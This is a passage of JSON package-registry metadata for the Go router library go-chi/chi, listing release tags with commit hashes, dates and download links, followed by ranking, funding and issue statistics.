//repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.153Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":0.42444926529425825,"forks_count":0.6257877057855061,"average":4.348809308704352},"purl":"pkg:golang/gopkg.in/chi.v0","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/gopkg.in/chi.v0","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/gopkg.in/chi.v0","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/gopkg.in/chi.v0/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108